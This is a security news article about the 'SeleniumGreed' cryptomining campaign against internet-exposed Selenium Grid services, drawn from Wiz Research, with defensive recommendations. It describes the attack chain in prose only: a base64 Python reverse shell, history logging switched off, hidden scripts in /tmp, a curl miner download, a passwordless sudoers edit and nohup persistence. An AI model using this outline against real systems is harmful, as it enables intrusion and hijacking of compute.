Unsecured Selenium Grid Services Become Hotspots for Cryptomining

A cryptomining campaign, known as “SeleniumGreed,” targets vulnerable Selenium Grid services, as reported by Wiz Research. Selenium Grid, a component of the widely used open-source Selenium suite for web application testing, enables extensive interaction with connected machines, including command execution and file manipulation. Primarily designed for internal network use, this service lacks built-in security controls. As Wiz explains, "Selenium Grid is designed for use in internal networks and lacks security controls by default. Ideally, such services should never be exposed to the internet." Concerns regarding this service are further emphasized with researchers pointing out, "the lack of a default authentication mechanism on this service means many exposed instances are misconfigured and can be accessed and exploited by malicious actors." This security oversight has been actively exploited by a threat actor for over a year.

Over the course of the observed attack, the adversary utilizes the Selenium WebDriver API to execute Python scripts containing a reverse shell command. This is achieved by leveraging commands to decode and execute a base64 encoded malicious payload. This specific payload initiates a reverse shell by executing a detailed Python command, which includes connecting to a remote host, disabling shell history logging by setting the HISTFILE environment variable to '/dev/null', and spawning a bash shell session with '/bin/bash'. Additionally, the attacker creates a hidden script within directories like "/tmp" or "/dev/shm," uses the curl command to download cryptomining software, and modifies file permissions with chmod 700 to restrict access. They may also modify the '/etc/sudoers' file to allow the 'seluser' to execute commands without password prompts. To ensure that scripts and binaries continue running uninterrupted after session termination, the adversary executes these files with nohup.

Misconfigurations of services remain a top area of breaches. Wiz’s report on the exploitation of the Selenium Grid service serves as a reminder of the necessity to secure devices, particularly those that are internet-facing. The implications of such an attack enable attackers to utilize the computing resources of compromised machines for cryptocurrency mining, which can lead to performance degradation and system instability. Wiz’s analysis underscores the need for organizations to properly secure their Selenium Grid instances and ensure they are not exposed to the public internet without adequate security measures. Further recommendations include the implementation of stringent network security controls focusing on inbound and outbound access, and the use of both external network scanners and vulnerability scanners to map exposure within cloud environments.